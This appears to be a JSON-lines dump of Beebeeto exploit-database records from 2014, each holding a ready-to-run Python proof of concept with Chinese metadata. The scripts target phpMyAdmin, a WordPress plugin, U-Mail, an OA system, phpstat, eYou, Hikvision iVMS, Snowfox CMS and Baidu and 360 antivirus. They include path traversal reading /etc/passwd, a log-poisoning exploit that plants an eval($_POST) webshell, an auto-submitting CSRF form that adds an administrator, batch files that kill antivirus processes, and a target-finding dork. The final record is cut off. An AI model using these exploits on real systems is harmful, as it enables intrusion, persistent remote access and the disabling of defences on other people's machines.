{"create_date": "2014-11-29 00:11:56", "name": "PHPMyAdmin 4.2.12 /libraries/gis/pma_gis_factory.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "phpmyadmin\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,/libraries/gis/pma_gis_factory.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0168',\r\n 'name': 'PHPMyAdmin 4.2.12 /libraries/gis/pma_gis_factory.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpmyadmin',\r\n 'vul_version': ['4.2.12'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['phpmyadmin\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', '/libraries/gis/pma_gis_factory.php', 'php'],\r\n 'desc': '''\r\n CVE-2014-8959(http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959)\r\n issue: http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php\r\n fix: https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5\r\n ''',\r\n 'references': ['http://bobao.360.cn/learning/detail/113.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n # Token & file_path, Modify their own.\r\n token = 'ChangeME'\r\n inclusion_file = '../../../ChangeMe.jpg%00'\r\n tmp_url = args['options']['target'] + '/pma/gis_data_editor.php?token=' + token\r\n verify_url = tmp_url + '&gis_data[gis_type]=' + inclusion_file\r\n if args['options']['verbose']:\r\n print '[*] Generation...'\r\n print '[+] Specific use: ' + 'edit token, inclusion_file.'\r\n print '[+] Generation ok'\r\n print\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "CVE-2014-8959(http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959)\r\nissue: http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php\r\nfix: https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5", "app_name": "PHPMyAdmin", "id": "poc-2014-0168", "layer4_protocol": null}
{"create_date": "2014-11-27 18:22:15", "name": "WordPress HTML 5 MP3 Player with Playlist \u63d2\u4ef6\u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Wordpress\u63d2\u4ef6\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,html5-mp3-player-with-playlist\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0166',\r\n 'name': 'WordPress HTML 5 MP3 Player with Playlist \u63d2\u4ef6\u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-11-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Wordpress\u63d2\u4ef6\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', 'html5-mp3-player-with-playlist\u6f0f\u6d1e', 'php'],\r\n 'desc': 'DORK: inurl:html5plus/html5full.php',\r\n 'references': ['http://www.exploit-db.com/exploits/35388/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_path = '/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php'\r\n verify_url = args['options']['target'] + file_path\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<b>Fatal error</b>:' in content and '</b> on line <b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DORK: inurl:html5plus/html5full.php", "app_name": "WordPress", "id": "poc-2014-0166", "layer4_protocol": null}
{"create_date": "2014-11-26 15:34:02", "name": "U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "jwong", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "U-Mail\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/api/api.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0165',\r\n 'name': 'U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u6f0f POC',\r\n 'author': 'jwong',\r\n 'create_date': '2014-11-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'U-Mail',\r\n 'vul_version': ['20141124'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['U-Mail\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/api/api.php', 'php'],\r\n 'desc': 'U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3002',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-070206',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/webmail/api/api.php?do=system'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'Warning' in content and 'system()' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3002", "app_name": "U-Mail", "id": "poc-2014-0165", "layer4_protocol": null}
{"create_date": "2014-11-25 10:32:53", "name": "\u5317\u4eac\u5e0c\u5c14\u81ea\u52a8\u5316OA\u7ba1\u7406\u7cfb\u7edf/\u6570\u636e\u5e93\u7cfb\u7edf /bnuoa/info/infoShowAction.do \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u5e0c\u5c14\u81ea\u52a8\u5316OA\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,bnuoa/info/infoShowAction.do,Linux\u7248\u672c", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0163',\r\n 'name': '\u5317\u4eac\u5e0c\u5c14\u81ea\u52a8\u5316OA\u7ba1\u7406\u7cfb\u7edf/\u6570\u636e\u5e93\u7cfb\u7edf /bnuoa/info/infoShowAction.do \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': '\u96f7\u950b',\r\n 'create_date': '2014-11-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'OA',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u5e0c\u5c14\u81ea\u52a8\u5316OA\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'bnuoa/info/infoShowAction.do', 'Linux\u7248\u672c'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-058386',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target'] + ('/bnuoa/info/infoShowAction.do?accessory=1&id='\r\n '../../../../../../../../../../etc/passwd%00.jpg&method=getAccessory')\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"root:\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0163", "layer4_protocol": null}
{"create_date": "2014-11-25 10:20:09", "name": "phpstat 1.0 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "jwong", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "phpstat\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d,/download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0162',\r\n 'name': 'phpstat 1.0 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC',\r\n 'author': 'jwong',\r\n 'create_date': '2014-11-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpstat',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['phpstat\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d', '/download.php', 'php'],\r\n 'desc': 'phpstat v1.0.20141124 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002',\r\n 'references': ['http://0day5.com/archives/2372',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/download.php?fname=1.txt&fpath=./include.inc/config.inc.php'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpstat v1.0.20141124 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002", "app_name": "phpstat", "id": "poc-2014-0162", "layer4_protocol": null}
{"create_date": "2014-11-21 21:09:53", "name": "eYou /sysinfo.html \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5927\u7070\u72fc", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou!\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,/sysinfo.html,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0157',\r\n 'name': 'eYou /sysinfo.html \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '\u5927\u5927\u7070\u72fc',\r\n 'create_date': '2014-11-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eYou',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['eYou!\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', '/sysinfo.html', 'php'],\r\n 'desc': 'eYou sysinfo Information Disclosure',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-061538',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n attack_url = args['options']['target'] + '/sysinfo.html'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + attack_url\r\n request = urllib2.Request(attack_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'Hostname:' in content and 'eyou' in content:\r\n args['success'] = True\r\n args['poc_ret']['verify_url'] = attack_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "eYou sysinfo Information Disclosure", "app_name": "eYou", "id": "poc-2014-0157", "layer4_protocol": null}
{"create_date": "2014-11-21 17:00:06", "name": "Hikvision /Server/logs/error.log \u6587\u4ef6\u5305\u542b\u5bfc\u81f4GETSHELL\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "\u6d77\u5eb7\u5a01\u89c6\u6f0f\u6d1e,\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0156',\r\n 'name': 'Hikvision /Server/logs/error.log \u6587\u4ef6\u5305\u542b\u5bfc\u81f4GETSHELL\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Hikvision',\r\n 'vul_version': ['iVMS-4200'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['\u6d77\u5eb7\u5a01\u89c6\u6f0f\u6d1e', '\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', 'php'],\r\n 'desc': '\u6d77\u5eb7\u5a01\u89c6IVMS\u7cfb\u5217\u7684\u76d1\u63a7\u5ba2\u6237\u7aef\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u5728\u5185\u7f51\u3002',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-072453',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/<?echo(md5(bb2))?>'\r\n test_url = args['options']['target'] + '/index.php?controller=../../../../Server/logs/error.log%00.php'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n urllib2.urlopen(verify_url)\r\n except urllib2.HTTPError, e:\r\n if e.code == 500:\r\n content = urllib2.urlopen(test_url).read()\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url_1'] = verify_url\r\n args['poc_ret']['vul_url_2'] = test_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target'] + '/<?echo(md5(bb2));eval($_POST[bb2])?>'\r\n test_url = args['options']['target'] + '/index.php?controller=../../../../Server/logs/error.log%00.php'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n urllib2.urlopen(verify_url)\r\n except urllib2.HTTPError, e:\r\n if e.code == 500:\r\n content = urllib2.urlopen(test_url).read()\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = test_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6d77\u5eb7\u5a01\u89c6IVMS\u7cfb\u5217\u7684\u76d1\u63a7\u5ba2\u6237\u7aef\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u5728\u5185\u7f51\u3002", "app_name": "\u6d77\u5eb7\u5a01\u89c6", "id": "poc-2014-0156", "layer4_protocol": null}
{"create_date": "2014-11-20 23:48:10", "name": "Snowfox CMS 1.0 CSRF Add Admin Exploit", "level": "\u4f4e\u5371", "batchable": 0, "author": "tmp", "rank": 2, "port": null, "vul_type": "CSRF", "tag": "Snowfox CMS\u6f0f\u6d1e,CSRF\u6dfb\u52a0\u7ba1\u7406\u5458,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0154',\r\n 'name': 'Snowfox CMS 1.0 CSRF Add Admin Exploit',\r\n 'author': 'tmp',\r\n 'create_date': '2014-11-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Snowfox',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Request Forgery',\r\n 'tag': ['Snowfox CMS\u6f0f\u6d1e', 'CSRF\u6dfb\u52a0\u7ba1\u7406\u5458', 'php'],\r\n 'desc': '''\r\n Snowfox CMS suffers from a cross-site request forgery vulnerabilities.\r\n The application allows users to perform certain actions via HTTP requests\r\n without performing any validity checks to verify the requests.\r\n This can be exploited to perform certain actions with administrative privileges\r\n if a logged-in user visits a malicious web site.\r\n Tested on: Apache/2.4.7 (Win32)\r\n PHP/5.5.6\r\n MySQL 5.6.14\r\n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/35301/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Generation: ' + verify_url\r\n temp = '''\r\n <div style=\"display: none;\">\r\n <form action=\"%s/?uri=admin/accounts/create\" method=\"POST\" name=\"ff0000team\">\r\n <input type=\"hidden\" name=\"emailAddress\" value=\"[email protected]\" />\r\n <input type=\"hidden\" name=\"verifiedEmail\" value=\"verified\" />\r\n <input type=\"hidden\" name=\"username\" value=\"USERNAME\" />\r\n <input type=\"hidden\" name=\"newPassword\" value=\"PASSWORD\" />\r\n <input type=\"hidden\" name=\"confirmPassword\" value=\"PASSWORD\" />\r\n <input type=\"hidden\" name=\"userGroups[]\" value=\"34\" />\r\n <input type=\"hidden\" name=\"userGroups[]\" value=\"33\" />\r\n <input type=\"hidden\" name=\"memo\" value=\"CSRFmemo\" />\r\n <input type=\"hidden\" name=\"status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"formAction\" value=\"submit\" />\r\n <input type=\"submit\" value=\"Submit form\" />\r\n </form>\r\n </div>\r\n <script>\r\n setTimeout(\"document.ff0000team.submit()\", 2000);\r\n </script>\r\n ''' % verify_url\r\n print '[*] Copy code: ' + temp\r\n print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Snowfox CMS suffers from a cross-site request forgery vulnerabilities. \r\nThe application allows users to perform certain actions via HTTP requests\r\nwithout performing any validity checks to verify the requests.\r\nThis can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.\r\n \r\nTested on: \r\n Apache/2.4.7 (Win32)\r\n PHP/5.5.6\r\n MySQL 5.6.14", "app_name": "Snowfox CMS", "id": "poc-2014-0154", "layer4_protocol": null}
{"create_date": "2014-11-20 00:15:06", "name": "\u767e\u5ea6\u6740\u6bd2 20141010 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "\u672c\u5730\u63d0\u6743,\u6740\u6389\u767e\u5ea6\u6740\u6bd2\u4e3b\u8fdb\u7a0b,chkdsk taskkill,\u767e\u5ea6\u6740\u6bd2\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0153',\r\n 'name': '\u767e\u5ea6\u6740\u6bd2 20141010 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-11-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'local',\r\n 'port': [0],\r\n 'layer4_protocol': [],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u767e\u5ea6',\r\n 'vul_version': ['20141010'],\r\n 'type': 'Other',\r\n 'tag': ['\u672c\u5730\u63d0\u6743', '\u6740\u6389\u767e\u5ea6\u6740\u6bd2\u4e3b\u8fdb\u7a0b', 'chkdsk taskkill', '\u767e\u5ea6\u6740\u6bd2\u6f0f\u6d1e'],\r\n 'desc': 'Wooyun Author zhuixing',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-078656',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payload = '''\r\n@echo off\r\nmode con cols=20 lines=1\r\nchkdsk /x d:\r\ntaskkill /F /IM baidusdsvc.exe /T\r\ntaskkill /F /IM baidusdtray.exe /T\r\n'''\r\n # write\r\n test_bat = open('./baidu-anti-virus-taskkill.bat', 'w')\r\n test_bat.write(payload)\r\n test_bat.close()\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok, file: ./baidu-anti-virus-taskkill.bat'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u767e\u5ea6", "id": "poc-2014-0153", "layer4_protocol": null}
{"create_date": "2014-11-20 00:05:56", "name": "360\u5b89\u5168\u536b\u58eb\u5b89\u88c5\u975e\u9ed8\u8ba4\u8def\u5f84 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "\u672c\u5730\u63d0\u6743,\u6740\u6389360\u4e3b\u8fdb\u7a0b,chkdsk taskkill,360\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0152',\r\n 'name': '360\u5b89\u5168\u536b\u58eb\u5b89\u88c5\u975e\u9ed8\u8ba4\u8def\u5f84 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-11-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'local',\r\n 'port': [0],\r\n 'layer4_protocol': [],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '360',\r\n 'vul_version': ['*'],\r\n 'type': 'Other',\r\n 'tag': ['\u672c\u5730\u63d0\u6743', '\u6740\u6389360\u4e3b\u8fdb\u7a0b', 'chkdsk taskkill', '360\u6f0f\u6d1e'],\r\n 'desc': '''\r\n Wooyun Author zhuixing:\r\n \u6d4b\u8bd5\u4f7f\u7528Windows XP SP3\uff0cVMware Workstation 10.0.3\u3002\r\n 